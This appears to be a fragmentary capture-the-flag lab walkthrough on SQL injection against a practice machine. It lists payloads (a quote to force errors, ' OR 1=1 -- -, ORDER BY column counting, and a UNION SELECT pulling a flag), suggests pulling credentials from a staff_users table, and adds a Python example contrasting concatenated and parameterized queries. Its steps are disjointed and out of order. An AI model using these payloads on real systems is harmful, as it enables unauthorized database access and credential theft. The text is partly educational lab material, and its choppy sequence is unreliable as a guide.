After 10–15 iterations, you’ll find: tryhackme123 again.

Article viewer at http://MACHINE_IP/article?id=1.

The search function concatenates user input directly into the SQL statement like this: ...WHERE username = '$username'.

Exploitation: Try entering a single quote (') to trigger a SQL error. Use the payload: ' OR 1=1 -- -

' : Closes the initial quote.
OR 1=1 : Makes the statement always true.
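The concatenated lookup described above next to its parameterized form, as an added example that is not part of the original walkthrough. It uses Python's sqlite3 in place of the lab application; the table layout, sample rows and function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Build an in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "constructed-pw-1"), ("bob", "constructed-pw-2")],
    )
    return db

def search_concatenated(db, username):
    """The pattern the page describes: input pasted into the SQL text."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in db.execute(sql)]

def search_parameterized(db, username):
    """Hardened form: the value is bound and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in db.execute(sql, (username,))]

def check_input(db, username):
    """Run one input through both versions; report SQL errors instead of raising."""
    results = {}
    for name, fn in (("concatenated", search_concatenated),
                     ("parameterized", search_parameterized)):
        try:
            results[name] = fn(db, username)
        except sqlite3.Error as exc:
            results[name] = "SQL error: %s" % exc
    return results

if __name__ == "__main__":
    db = make_db()
    # A normal value, the lone quote, and the payload quoted on the page.
    for value in ("alice", "'", "' OR 1=1 -- -"):
        print(repr(value), check_input(db, value))
```

With bound parameters the quote and the payload are compared as literal usernames, so they match no row and raise no SQL error.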

Use the ORDER BY technique.

Try inputs like:

SELECT * FROM users WHERE username = '$input' AND password = '$password';

Once you find a table like staff_users, pull the credentials.

Use ORDER BY to find the column count. Payload: 1 ORDER BY 1-- - (keep increasing the number until an error occurs).

?id=1 UNION SELECT 1,2,3,flag FROM secrets